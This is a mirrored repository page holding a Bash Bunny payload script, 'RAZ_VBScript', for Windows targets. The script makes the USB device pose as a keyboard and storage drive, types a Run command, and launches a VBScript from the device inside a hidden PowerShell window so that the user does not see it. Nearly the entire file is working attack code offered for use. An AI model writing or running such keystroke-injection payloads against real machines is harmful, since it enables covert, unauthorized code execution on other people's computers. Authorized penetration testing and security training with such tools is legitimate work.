mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
46 lines
1.4 KiB
Bash
46 lines
1.4 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: RAZ_VBScript
|
|
# Author: RalphyZ
|
|
# Version: 1.1a
|
|
# Target: Windows 7+
|
|
# Dependencies: VBScript (a.vbs) in the switch folder with this file
|
|
#
|
|
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
|
#
|
|
# Colors:
|
|
# | Status | Color | Description |
|
|
# | ---------- | ------------------------------| ------------------------------------------------ |
|
|
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
|
|
# | FAIL | Red slow blink | Could not find the a.vbs script |
|
|
# | ATTACK | Yellow single blink | Running the VBScript |
|
|
# | FINISH | Green blink followed by SOLID | Script is finished |
|
|
|
|
# Magenta solid
|
|
LED SETUP
|
|
|
|
# Set the attack mode
|
|
ATTACKMODE HID STORAGE
|
|
|
|
# Get the switch position
|
|
GET SWITCH_POSITION
|
|
|
|
# Check if a.vbs is present
|
|
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
|
|
LED FAIL
|
|
exit 1
|
|
fi
|
|
|
|
# Start the attack - yellow single blink
|
|
LED ATTACK
|
|
|
|
# Run the VBScript
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe"
|
|
QUACK ENTER
|
|
|
|
|
|
# Green 1000ms VERYFAST blink followed by SOLID
|
|
LED FINISH
|
|
exit 0 |